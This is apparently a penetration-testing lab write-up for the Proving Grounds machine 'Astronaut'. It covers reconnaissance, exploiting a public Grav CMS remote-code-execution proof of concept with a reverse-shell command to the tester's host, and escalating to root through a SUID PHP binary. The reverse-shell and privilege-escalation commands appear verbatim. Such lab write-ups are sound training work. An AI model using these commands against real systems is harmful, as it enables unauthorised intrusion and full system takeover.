Astronaut
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon as usual, which revealed two open ports on the target:
SSH (22)
HTTP (80)
Service Analysis
Browsing to the HTTP service led me to a Grav CMS admin interface (grav-admin).

I checked the robots.txt file, which listed multiple directories, but after checking them all, they led nowhere.

I also discovered a login page for the admin. However, default credentials didn’t work, and I noticed that accounts lock after several failed attempts, so bruteforcing wasn’t an option.
Gaining Initial Access
After some research, I found multiple CVEs for Grav. One of which allowed for remote code execution (RCE). I found a PoC and tried it.
Initially, my attempts failed when I included a trailing “/” at the end of the target URL. Once I removed the trailing slash, the exploit worked. For instance, while this command:
python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin/
didn’t work, this one did the trick:
python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin
This allowed me to get a reverse shell on the target.

Privilege Escalation
Once I had shell access, I ran linpeas.sh to identify further avenues for privilege escalation.
The scan revealed a cron job that executed every minute, running a PHP script. I attempted to inject into this PHP script, but soon realized the file was owned by www-data, meaning the shell remained at the same privilege level.

Continuing my search, I ran to look for SUID binaries:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
This command revealed that PHP itself had the SUID bit set. Checking gtfobins provided me with the code required to exploit this. I then executed the command to escalate privileges to root:
php -r "pcntl_exec('/bin/sh', ['-p']);"

Lessons Learned
Exploit Error: A subtle difference in the target URL (with or without a trailing slash) can make or break an exploit.
SUID Misconfiguration: Misconfigured SUID permissions on PHP was the way for privilege escalation.
Last updated